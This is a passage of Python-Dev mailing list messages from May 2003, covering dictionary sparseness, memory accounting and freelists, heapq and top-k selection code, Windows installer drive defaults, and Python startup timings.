> is where I might gain hugely (by fighting excessive working sets through
> selective flushing of caches, freelists, etc).

Any idea how to actually do this?

Jeremy




From python@rcn.com  Mon May  5 19:12:53 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 5 May 2003 14:12:53 -0400
Subject: [Python-Dev] Dictionary sparseness
References: <BIEJKCLHCIOIHAGOKOLHCECGFJAA.tim.one@comcast.net>
Message-ID: <000101c31339$791838c0$125ffea9@oemcomputer>

> the best thing a user can do is rebuild the dict from scratch, inserting keys by
> decreasing order of access frequency.

Then a periodic resize comes alongm re-inserting everything
in a different order.


>The size of the dict can be forced larger by
> inserting artificial keys, if a user is insane <wink>. 

Uh oh:
    http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/198157


> You'd have to be nuts, though 

That explains alot ;)


Does the *4 patch (amended to have an upper bound) have a chance?
It's automatic, simple, benefits some cases while not harming others,


Raymond


From aleax@aleax.it  Mon May  5 20:21:28 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 21:21:28 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <1052158331.12534.31.camel@slothrop.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051957.25403.aleax@aleax.it> <1052158331.12534.31.camel@slothrop.zope.com>
Message-ID: <200305052121.28017.aleax@aleax.it>

On Monday 05 May 2003 08:12 pm, Jeremy Hylton wrote:
> On Mon, 2003-05-05 at 13:57, Alex Martelli wrote:
> > On Monday 05 May 2003 07:46 pm, Guido van Rossum wrote:
> > > > No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> > > > work with a system that thinks it's so smart it doesn't need my
> > > > advisory input -- or at least not on anything that's as
> > > > performance-crucial as those Fortran programs were [...]
> > >
> > > I severely doubt that any Python apps are as performance-critical as
> > > those Fortran programs were.
> >
> > Yes, this may well be correct.  My only TRUE wish for tuning performance
> > of Python applications is to have SOME ways to measure memory
> > footprints with sensible guesses about where they come from -- THAT
> > is where I might gain hugely (by fighting excessive working sets through
> > selective flushing of caches, freelists, etc).
>
> Any idea how to actually do this?

Not really, even though I've been thinking about it for a while -- pymalloc's
the only "hook" that comes to mind so far.


Alex



From skip@pobox.com  Mon May  5 20:35:23 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 14:35:23 -0500
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <200305051957.25403.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305051936.20078.aleax@aleax.it>
 <200305051746.h45HkS009569@odiug.zope.com>
 <200305051957.25403.aleax@aleax.it>
Message-ID: <16054.48379.533379.672799@montanaro.dyndns.org>

    Alex> My only TRUE wish for tuning performance of Python applications is
    Alex> to have SOME ways to measure memory footprints with sensible
    Alex> guesses about where they come from

Here's a thought.  Debug builds appear to now add a getobjects method to
sys.  Would it be possible to also add another method to sys (also only
available on debug builds) which knows just enough about basic builtin
object types to say a little about how much space it's consuming?  For
example, I could do something like this:

    allocdict = {}
    for o in sys.getobjects(0):
        allocsize = sys.get_object_allocation_size(o)
        # I'm not a fan of {}.setdefault()
        alloc = allocdict.get(type(o), [])
        alloc.append(allocsize) # or alloc.append((allocsize, o))
        allocdict[type(o)] = alloc

Once the list is traversed you can poke around in allocdict figuring out
where your memory went (other than to allocdict itself!).

(I was tempted to suggest another method, but I fear that would just spread
the mess around.  That may also be a viable option though.)

Skip


From tim@zope.com  Mon May  5 20:34:58 2003
From: tim@zope.com (Tim Peters)
Date: Mon, 5 May 2003 15:34:58 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <000101c31339$791838c0$125ffea9@oemcomputer>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com>

[Tim]
>> the best thing a user can do is rebuild the dict from scratch,
>> inserting keys by decreasing order of access frequency.

[Raymond Hettinger]
> Then a periodic resize comes alongm re-inserting everything
> in a different order.

Sure -- micro-optimizations are always fragile.  This kind of thing will be
done by someone who's certain the dict is henceforth read-only, and who
thinks it's worth the risk and obscurity to get some small speedup.  They're
probably right at the time they do it, too, and probably wrong over time.
Same thing goes for, e.g., an madvise() call claiming a current truth that
changes over time.

> ...
> Does the *4 patch (amended to have an upper bound) have a chance?
> It's automatic, simple, benefits some cases while not harming others,

It would be nice if more people tried it and added their results to the
patch report:

    http://www.python.org/sf/729395

Right now, we just have Guido's comment saying that he no longer sees the
Zope3 startup speedup he thought he saw earlier.  Small percentage speedups
are like that, alas.  The patch is OK by me.



From tim.one@comcast.net  Mon May  5 20:56:41 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 15:56:41 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <16054.48379.533379.672799@montanaro.dyndns.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEDFFJAA.tim.one@comcast.net>

[Skip Montanaro]
> Here's a thought.  Debug builds appear to now add a getobjects method to
> sys.

Yes, although that isn't new -- it's been there forever (read
Misc/SpecialBuilds.txt).

> Would it be possible to also add another method to sys (also only
> available on debug builds) which knows just enough about basic builtin
> object types to say a little about how much space it's consuming?

Marc-Andre has something like that in mxTools already (his sizeof()
function).

Note also the COUNT_ALLOCS special build, which saves info about total # of
allocations, deallocations, and highwater mark per type, made available via
sys.getcounts().  The nifty thing about COUNT_ALLOCS is that you can enable
it in a release build (it doesn't rely on the debug-build changes to the
layout of PyObject).

Stuff all these things miss (even pymalloc, because it isn't asked for the
memory) include the immortal and unbounded int freelist, the I&U float FL,
and the immortal but bounded frameobject FL.  Do, e.g., range(2000000) (as
someone did on c.l.py last week), and about 24MB "goes missing" until the
program shuts down (it's sitting in the int FL).  Note that pymalloc never
returns its "arenas" to the system either.



From zooko@zooko.com  Mon May  5 21:02:08 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 05 May 2003 16:02:08 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: Message from "Raymond Hettinger" <python@rcn.com>
 of "Sun, 04 May 2003 22:26:47 EDT." <003f01c312ad$c7277580$125ffea9@oemcomputer>
References: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>  <003f01c312ad$c7277580$125ffea9@oemcomputer>
Message-ID: <E19CmA4-0006db-00@localhost>

>From heapq.py:

"""
Usage:

heap = []            # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0]       # smallest item on the heap without popping it
...
[It is] possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""

Shouldn't heapq be a subclass of list?

Then it would read:

"""
heap = heapq()    # creates an empty heap
heap.push(item)   # pushes a new item on the heap
item = heap.pop() # pops the smallest item from the heap
item = heap[0]    # smallest item on the heap without popping it
"""

In addition to nicer syntax, this would give you the option to forbid 
invariant-breaking alterations.  Although you could also choose to allow 
invariant-breaking alterations, just as the current heapq does.

One thing I don't know how to implement is:

# This changes mylist itself into a heapq -- it doesn't make a copy of mylist!
makeheapq(mylist)

Perhaps this is a limitation of the current object model?  Or is there a way to 
change an object's type at runtime.

Regards,

Zooko

http://zooko.com/


From agthorr@barsoom.org  Mon May  5 21:14:16 2003
From: agthorr@barsoom.org (Agthorr)
Date: Mon, 5 May 2003 13:14:16 -0700
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com>
References: <000101c31339$791838c0$125ffea9@oemcomputer> <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com>
Message-ID: <20030505201416.GB17384@barsoom.org>

On Mon, May 05, 2003 at 03:34:58PM -0400, Tim Peters wrote:
> Sure -- micro-optimizations are always fragile.  This kind of thing will be
> done by someone who's certain the dict is henceforth read-only, and who
> thinks it's worth the risk and obscurity to get some small speedup.  

An alternate optimization would be the additional of an immutable
dictionary type to the language, initialized from a mutable dictionary
type.  Upon creation, this dictionary would optimize itself, in a
manner similar to "gperf" program which creates (nearly) minimal
zero-collision hash tables.

On this plus side, this would form a nice symmetry with the existing
mutable vs immutable types.

Also, it would be proof against bit-rot, since either:
 a) the user changes the mutable dictionary before it is optimized.
    In this case, the optimizer will simply optimize the new
    dictionary, or
 b) the user attempts to modify the immutable dictionary, which will
    fail with an error.

-- Agthorr


From skip@pobox.com  Mon May  5 21:24:39 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 15:24:39 -0500
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEDFFJAA.tim.one@comcast.net>
References: <16054.48379.533379.672799@montanaro.dyndns.org>
 <BIEJKCLHCIOIHAGOKOLHGEDFFJAA.tim.one@comcast.net>
Message-ID: <16054.51335.255858.381526@montanaro.dyndns.org>

    Tim> Stuff all these things miss (even pymalloc, because it isn't asked
    Tim> for the memory) include the immortal and unbounded int freelist,
    Tim> the I&U float FL, and the immortal but bounded frameobject FL.  Do,
    Tim> e.g., range(2000000) (as someone did on c.l.py last week), and
    Tim> about 24MB "goes missing" until the program shuts down (it's
    Tim> sitting in the int FL).  Note that pymalloc never returns its
    Tim> "arenas" to the system either.

These shortcomings could be remedied by suitable inspection functions added
to sys for debug builds.

This leads me to wonder, has anyone measured the cost of deleting the int
and float free lists when pymalloc is enabled?  I wonder how unbearable it
would be.

Skip


From martin@v.loewis.de  Mon May  5 21:39:40 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 05 May 2003 22:39:40 +0200
Subject: [Python-Dev] How to test this?
In-Reply-To: <16054.30310.489999.134263@montanaro.dyndns.org>
References: <16054.30310.489999.134263@montanaro.dyndns.org>
Message-ID: <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> I just added a patch file to <http://python.org/sf/731501>.  It
> doesn't include any test cases, since that requires an old db hash
> v2 file present.  Is it okay to check in a dummy file to Lib/test
> for this purpose?

Make sure you use -kb in the cvs add. Apart from that, it would be
fine by me - except that I recall that the file format is
endianness-sensitive, so you should make sure that the test passes on
machines of both endiannesses before adding the file.

Regards,
Martin



From aleax@aleax.it  Mon May  5 21:42:40 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 22:42:40 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <20030505201416.GB17384@barsoom.org>
References: <000101c31339$791838c0$125ffea9@oemcomputer> <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com> <20030505201416.GB17384@barsoom.org>
Message-ID: <200305052242.40380.aleax@aleax.it>

On Monday 05 May 2003 10:14 pm, Agthorr wrote:
> On Mon, May 05, 2003 at 03:34:58PM -0400, Tim Peters wrote:
> > Sure -- micro-optimizations are always fragile.  This kind of thing will
> > be done by someone who's certain the dict is henceforth read-only, and
> > who thinks it's worth the risk and obscurity to get some small speedup.
>
> An alternate optimization would be the additional of an immutable
> dictionary type to the language, initialized from a mutable dictionary

I'd love a read-only dictionary (AND a read-only list) for reasons having
little to do with optimization, actually -- ease of use as dict keys and/or
set members, plus, occasional help in catching errors (for the latter use
it would be wonderful if read-only dictionaries could be actually
substituted in place of such things as instance and class dictionaries).

Tuples are no substitutes for read-only lists because they lack many
useful "read-only" methods of lists (and won't grow them, as the BDFL
has abundantly made clear, as he sees tuples as drastically different
from lists).  Neither, even more clearly, are e.g. tuples of pairs a good
substitute for read-only dictionaries.

I've played with adding more selective "locking" to dicts but I was unable
to do it without a performance hit.  If wholesale "RO-ness" can in fact
*increase* performance in some cases, so much the better. "RO lists"
could probably save a little memory compared to normal ones since they
would need no "spare space" for growing.


Alex



From martin@v.loewis.de  Mon May  5 21:43:17 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 05 May 2003 22:43:17 +0200
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEBGFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHOEBGFJAA.tim.one@comcast.net>
Message-ID: <m3u1c9azve.fsf@mira.informatik.hu-berlin.de>

Tim Peters <tim.one@comcast.net> writes:

> Are you saying that the "Select Destination Directory" dialog box doesn't
> allow you to select your E: drive?  Or just that you'd rather not need to
> select the drive you want?

I second the second; I noticed that Python installed on the "wrong
drive" (i.e. the W9x installation) only after installation was
complete. I don't know (and can't check at the moment) whether it
offered me to pick e:. It probably did, but I don't know for sure.

> So, AFAIK, there isn't a straightforward way to get Wise 8.14 to suggest a
> drive other than C:.  Perhaps it would work better for you if I removed the
> Wizard-generated hardcoded "C:" (I don't know which drive Wise would pick
> then), but since yours is the only complaint about this I've seen, and I
> have no way to test such a change, I'm very reluctant to fiddle with it.

I have the same complaint, and I'd happily test any updated installer.

Regards,
Martin


From zooko@zooko.com  Mon May  5 21:58:21 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 05 May 2003 16:58:21 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Message from Alex Martelli <aleax@aleax.it>
 of "Mon, 05 May 2003 22:42:40 +0200." <200305052242.40380.aleax@aleax.it>
References: <000101c31339$791838c0$125ffea9@oemcomputer> <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com> <20030505201416.GB17384@barsoom.org>  <200305052242.40380.aleax@aleax.it>
Message-ID: <E19Cn2U-0007KX-00@localhost>

 Alex Martelli wrote:
>
> I'd love a read-only dictionary (AND a read-only list) for reasons having
> little to do with optimization, actually [...]

Me too!

It would be very useful for secure Python -- I could pass my list to some 
without risking that it mutates my list.  Without RO-lists I have to make a copy 
of my list every time I want to show it to someone.

Regards,

Zooko

http://zooko.com/


From tim.one@comcast.net  Mon May  5 22:00:16 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 17:00:16 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <16054.51335.255858.381526@montanaro.dyndns.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEDNFJAA.tim.one@comcast.net>

[Skip Montanaro]

[on assorted freelists]
> These shortcomings could be remedied by suitable inspection
> functions added to sys for debug builds.

If someone cares enough <wink>, sure.

> This leads me to wonder, has anyone measured the cost of deleting the
> int and float free lists when pymalloc is enabled?  I wonder how
> unbearable it would be.

Vladimir did when he was first developing pymalloc, and left the free lists
in deliberately.  I haven't tried it.  pymalloc is a bit faster since then,
but will always have the additional overhead of needing to figure out
*which* freelist to look in (pymalloc's free lists are segregated by block
size), and, because it recycles empty pools among different block sizes too,
the overhead on free of checking for pool emptiness.  The int free list is
faster in part because it's so damn Narcissistic <0.7 wink>.



From skip@pobox.com  Mon May  5 22:24:59 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 16:24:59 -0500
Subject: [Python-Dev] How to test this?
In-Reply-To: <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>
References: <16054.30310.489999.134263@montanaro.dyndns.org>
 <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>
Message-ID: <16054.54955.226043.202262@montanaro.dyndns.org>

    Martin> Make sure you use -kb in the cvs add. 

Thanks, I'd forgotten about that.

    Martin> Apart from that, it would be fine by me - except that I recall
    Martin> that the file format is endianness-sensitive, so you should make
    Martin> sure that the test passes on machines of both endiannesses
    Martin> before adding the file.

It appears the database itself accounts for the endianness of the file.  I
copied my test db file from my Mac to a Linux PC.  struct.unpack("=l",
f.read(4)) showed different values on the two systems (0x61561 vs
0x61150600) but bsddb185 on both systems could read the file.  This is a
very nice property of Berkeley DB in general.  I copy db files from the
spambayes project all the time.  rsync(1) sure beats the heck out of dumping
and reloading a 20+MB file all the time.

Skip


From martin@v.loewis.de  Mon May  5 23:03:00 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 06 May 2003 00:03:00 +0200
Subject: [Python-Dev] How to test this?
In-Reply-To: <16054.54955.226043.202262@montanaro.dyndns.org>
References: <16054.30310.489999.134263@montanaro.dyndns.org>
 <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>
 <16054.54955.226043.202262@montanaro.dyndns.org>
Message-ID: <m3smrt831n.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> It appears the database itself accounts for the endianness of the file.  I
> copied my test db file from my Mac to a Linux PC.  struct.unpack("=l",
> f.read(4)) showed different values on the two systems (0x61561 vs
> 0x61150600) but bsddb185 on both systems could read the file.  This is a
> very nice property of Berkeley DB in general.

That's good to hear. I thought I understood a report on the Subversion
mailing list that you can't move databases across endianesses, but
that might have been an unrelated issue.

Regards,
Martin



From tim.one@comcast.net  Tue May  6 01:33:39 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 20:33:39 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <003f01c312ad$c7277580$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAAEFAB.tim.one@comcast.net>

[Raymond Hettinger]
> FWIW, there is C implementation of heapq at:
>    http://zhar.net/projects/python/

Cool!  I thought the code was remarkably clear, until I realized it never
checked for errors (e.g., PyList_Append() can run out of memory, and
PyObject_RichCompareBool() can raise any exception).  Those would have to be
repaired, and doing so would slow it some.

If the heapq module survives with the same API for a release or two, it
would be a fine candidate to move into C, or maybe Pyrex (fiddly little
integer arithmetic interspersed via if/then/else with trivial array indexing
aren't Python's strong suits).



From tim.one@comcast.net  Tue May  6 03:35:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 22:35:28 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <20414172.1052079989@[10.0.1.2]>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAFEFAB.tim.one@comcast.net>

[David Eppstein, on the bar-raising behavior of

     person > q[0]
]

> Good point.  If any permutation of the input sequence is equally likely,
> and you're selecting the best k out of n items, the expected number of
> times you have to hit the data structure in your heapq solution
> is roughly k ln n, so the total expected time is O(n + k log k log n),
> with a really small constant factor on the O(n) term.  The sorting
> solution I suggested has total time O(n log k), and even though sorting
> is built-in and fast it can't compete when k is small.   Random pivoting
> is O(n + k), but with a larger constant factor, so your heapq solution
> looks like a winner.

In real Python Life, it's the fastest way I know (depending ...).

> For fairness, it might be interesting to try another run of your test
> in which the input sequence is sorted in increasing order rather
> than random.

Comparing the worst case of one against the best case of the other isn't my
idea of fairness <wink>, but sure.  On the best-1000 of a million floats
test, and sorting the floats first, the heap method ran about 30x slower
than on random data, and the sort method ran significantly faster than on
random data (a factor of 1.3x faster).  OTOH, if I undo my speed tricks and
call a function in the sort method (instead of doing it all micro-optimized
inline), that slows the sort method by a bit over a factor of 2.

> I.e., replace the random generation of seq by
>     seq = range(M)
> I'd try it myself, but I'm still running python 2.2 and haven't
> installed heapq.  I'd have to know more about your application to
> have an idea whether the sorted or randomly-permuted case is more
> representative.

Of course --  so would I <wink>.

Here's a surprise:  I coded a variant of the quicksort-like partitioning
method, at the bottom of this mail.  On the largest-1000 of a million
random-float case, times were remarkably steady across trials (i.e., using a
different set of a million random floats each time):

heapq                    0.96 seconds
sort (micro-optimized)   3.4  seconds
KBest (below)            2.6  seconds

The KBest code creates new lists with wild abandon.  I expect it does better
than the sort method anyway because it gets to exploit its own form of
"raise the bar" behavior as more elements come in.  For example, on the
first run, len(buf) exceeded 3000 only 14 times, and the final pivot value
each time is used by put() as an "ignore the input unless it's bigger than
that" cutoff:

pivoted w/ 0.247497558554
pivoted w/ 0.611006884768
pivoted w/ 0.633565558936
pivoted w/ 0.80516673256
pivoted w/ 0.814304890889
pivoted w/ 0.884660572175
pivoted w/ 0.89986744075
pivoted w/ 0.946575251872
pivoted w/ 0.980386533221
pivoted w/ 0.983743795382
pivoted w/ 0.992381911217
pivoted w/ 0.994243625292
pivoted w/ 0.99481443021
pivoted w/ 0.997044443344

The already-sorted case is also a bad case for this method, because then the
pivot is never big enough to trigger the early exit in put().


def split(seq, pivot):
    lt, eq, gt = [], [], []
    lta, eqa, gta = lt.append, eq.append, gt.append
    for x in seq:
        c = cmp(x, pivot)
        if c < 0:
            lta(x)
        elif c:
            gta(x)
        else:
            eqa(x)
    return lt, eq, gt

# KBest(k, minusinf) remembers the largest k objects
# from a sequence of objects passed one at a time to
# put().  minusinf must be smaller than any object
# passed to put().  After feeding in all the objects,
# call get() to retrieve a list of the k largest (or
# as many as were passed to put(), if put() was called
# fewer than k times).

class KBest(object):
    __slots__ = 'k', 'buflim', 'buf', 'cutoff'

    def __init__(self, k, minusinf):
        self.k = k
        self.buflim = 3*k
        self.buf = []
        self.cutoff = minusinf

    def put(self, obj):
        if obj <= self.cutoff:
            return

        buf = self.buf
        buf.append(obj)
        if len(buf) <= self.buflim:
            return

        # Reduce len(buf) by at least one, by retaining
        # at least k, and at most len(buf)-1, of the
        # largest objects in buf.
        from random import choice
        sofar = []
        k = self.k
        while len(sofar) < k:
            pivot = choice(buf)
            buf, eq, gt = split(buf, pivot)
            sofar.extend(gt)
            if len(sofar) < k:
                sofar.extend(eq[:k - len(sofar)])

        self.buf = sofar
        self.cutoff = pivot

    def get(self):
        from random import choice
        buf = self.buf
        k = self.k
        if len(buf) <= k:
            return buf

        # Retain only the k largest.
        sofar = []
        needed = k
        while needed:
            pivot = choice(buf)
            lt, eq, gt = split(buf, pivot)
            if len(gt) <= needed:
                sofar.extend(gt)
                needed -= len(gt)
                if needed:
                    takefromeq = min(len(eq), needed)
                    sofar.extend(eq[:takefromeq])
                    needed -= takefromeq
                # If we still need more, they have to
                # come out of things < pivot.
                buf = lt
            else:
                # gt alone is too large.
                buf = gt

        assert len(sofar) == k
        self.buf = sofar
        return sofar



From BPettersen@NAREX.com  Tue May  6 05:40:04 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Mon, 5 May 2003 22:40:04 -0600
Subject: [Python-Dev] Windows installer request...
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE23A@admin56.narex.com>

> From: Tim Peters [mailto:tim.one@comcast.net]=20
>=20
> [Bjorn Pettersen]
> > Would it be possible for the windows installer to use=20
> > $SYSTEMDRIVE$ as the default installation drive instead=20
> > of C:?
[...]

> Are you saying that the "Select Destination Directory" dialog=20
> box doesn't allow you to select your E: drive?  Or just=20
> that you'd rather not need to select the drive you want?

Most installers default to the system drive, so I didn't even look the
first time. I am able to change it manually.

> > If it's considered a good idea, and someone can point me to=20
> > where the change has to be made, I'd be more than willing to=20
> > produce a patch...
>=20
> I apparently left this comment in the Wise script:
>=20
>     Note from Tim:  doesn't seem to be a way to get the true=20
>     boot drive, the Wizard hardcodes "C".
>=20
> So, AFAIK, there isn't a straightforward way to get Wise 8.14=20
> to suggest a drive other than C:.

It should be as easy as (platforms that doesn't have %systemdrive% could
only install to C:):

 item: Get Environment Variable
   Variable=3DOSDRIVE
   Environment=3DSystemDrive
   Default=3DC:
 end

However, you might have to do

 item: Get Registry Key Value
   Variable=3DOSDRIVE
   Key=3DSystem\CurrentControlSet\Control\Session Manager\Environment
   Value Name=3DSystemDrive
   Flags=3D00000100
   Defualt=3DC:
 end

(not sure about the Flags parameter) I couldn't find much documentation,
and the example I'm looking at is a litte "divided" about which it
should use... I think it tries the first one, and falls back on the
second(?) (http://ibinstall.defined.net/dl_scripts.htm,
script_6016.zip/IBWin32Setup.wse).

Also, it looks like you want to use %SYS32% to get to the windows system
directory (on WinXP, it's c:\windows\system32, which doesn't seem to be
listed anywhere...)

I can't figure out how you're building the installer however. If you can
point me in the right direction I can test it on my special WinXP,
regular WinXP, Win98, Win2k, and maybe WinNT4 (I think we still have one
around :-).

-- bjorn



From eppstein@ics.uci.edu  Tue May  6 07:00:24 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Mon, 05 May 2003 23:00:24 -0700
Subject: [Python-Dev] Re: heaps
References: <20414172.1052079989@[10.0.1.2]> <LNBBLJKPBEHFEDALKOLCIEAFEFAB.tim.one@comcast.net>
Message-ID: <eppstein-4216E0.23002405052003@main.gmane.org>

In article <LNBBLJKPBEHFEDALKOLCIEAFEFAB.tim.one@comcast.net>,
 Tim Peters <tim.one@comcast.net> wrote:

> > For fairness, it might be interesting to try another run of your test
> > in which the input sequence is sorted in increasing order rather
> > than random.
> 
> Comparing the worst case of one against the best case of the other isn't my
> idea of fairness <wink>, but sure.

Well, it doesn't seem any fairer to use random data to compare an 
algorithm with an average time bound that depends on an assumption of 
randomness in the data...anyway, the point was more to understand the 
limiting cases.  If one algorithm is usually 3x faster than the other, 
and is never more than 10x slower, that's better than being usually 3x 
faster but sometimes 1000x slower, for instance.

> > I'd have to know more about your application to
> > have an idea whether the sorted or randomly-permuted case is more
> > representative.
> 
> Of course --  so would I <wink>.

My Java KBest code was written to make data subsets for a half-dozen web 
pages (same data selected according to different criteria).  Of these 
six instances, one is presented the data in roughly ascending order, one 
in descending order, and the other four are less clear but probably not 
random.

Robustness in the face of this sort of variation is why I prefer any 
average-case assumptions in my code's performance to depend only on 
randomness from a random number generator, and not arbitrariness in the 
actual input.  But I'm not sure I'd usually be willing to pay a 3x 
penalty for that robustness.

> Here's a surprise:  I coded a variant of the quicksort-like partitioning
> method, at the bottom of this mail.  On the largest-1000 of a million
> random-float case, times were remarkably steady across trials (i.e., using a
> different set of a million random floats each time):
> 
> heapq                    0.96 seconds
> sort (micro-optimized)   3.4  seconds
> KBest (below)            2.6  seconds

Huh.  You're almost convincing me that asymptotic analysis works even in 
the presence of Python's compiled-vs-interpreted anomalies.  The other 
surprise is that (unlike, say, the sort or heapq versions) your KBest 
doesn't look significantly more concise than my earlier Java 
implementation.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From harri.pasanen@trema.com  Tue May  6 09:55:27 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Tue, 6 May 2003 10:55:27 +0200
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <16054.48379.533379.672799@montanaro.dyndns.org>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051957.25403.aleax@aleax.it> <16054.48379.533379.672799@montanaro.dyndns.org>
Message-ID: <200305061055.27898.harri.pasanen@trema.com>

Speaking of memory consumption, has the memory footprint of Python 
changed significantly from 2.2 to 2.3?

I've been toying with the idea of making a small python ever since I 
compiled Python 1.0 for MS-DOS box with 512Kb of memory.   I've 
scanned at the Palm Python stuff, but I did not have a clear picture 
if they really did everything possible to make it small, including 
changing the representation of internal structs, or did they just 
chop away the complex type, parser, compiler, etc?

Regards,

Harri





From mal@lemburg.com  Tue May  6 11:03:15 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Tue, 06 May 2003 12:03:15 +0200
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary	sparseness)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAEDNFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHAEDNFJAA.tim.one@comcast.net>
Message-ID: <3EB78863.5070105@lemburg.com>

Tim Peters wrote:
> [Skip Montanaro]
> 
> [on assorted freelists]
> 
>>These shortcomings could be remedied by suitable inspection
>>functions added to sys for debug builds.
> 
> If someone cares enough <wink>, sure.
> 
>>This leads me to wonder, has anyone measured the cost of deleting the
>>int and float free lists when pymalloc is enabled?  I wonder how
>>unbearable it would be.
> 
> Vladimir did when he was first developing pymalloc, and left the free lists
> in deliberately.  I haven't tried it.  pymalloc is a bit faster since then,
> but will always have the additional overhead of needing to figure out
> *which* freelist to look in (pymalloc's free lists are segregated by block
> size), and, because it recycles empty pools among different block sizes too,
> the overhead on free of checking for pool emptiness.  The int free list is
> faster in part because it's so damn Narcissistic <0.7 wink>.

If someone really care, I suppose that the garbage collector could
do an occasional scan of the int free list and chop of the tail
after a certain number of entries.

FWIW, Unicode free lists have a cap to limit the number of entries
in the list to 1024.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 06 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        49 days left



From guido@python.org  Tue May  6 13:07:54 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 08:07:54 -0400
Subject: [Python-Dev] Startup time
Message-ID: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>

While Python's general speed has gone up, its startup speed has slowed
down!

I timed this two different ways.  The first way is to run

  python<version> -c "import time; print time.clock()"

On Unix, this prints the CPU time used since the process was created.
The second way is to run

  time python<version> -c pass

which shows CPU and real time to complete running the process.  I did
this on a 633 MHz PC running Red Hat Linux 7.3.  The Python builds
were standard non-debug builds.  I tried with and without the -S
option, which is supposed to suppress loading of site.py and hence
most startup overhead; it didn't exist in Python 1.3 and 1.4.

Results for the first way are pretty inaccurate because it's such a
small number and is only measured in 1/100 of a second, yet revealing.
Some times are printed as two values; I didn't do enough runs to
compute a careful average, so I'm just showing the range:

  Version	CPU Time	CPU Time with -S
  1.3		0.00		N/A
  1.4		0.00		N/A
  1.5.2		0.01		0.00
  2.0		0.01-0.02	0.00
  2.1		0.01-0.02	0.00
  2.2		0.02		0.00
  2.3		0.04		0.03-0.04

Now using time:

  Version	CPU Time	CPU Time with -S
  1.3		0.004		N/A
  1.4		0.004		N/A
  1.5		0.018		0.006
  2.0		0.021		0.006
  2.1		0.018		0.004
  2.2		0.025		0.004
  2.3		0.045		0.045

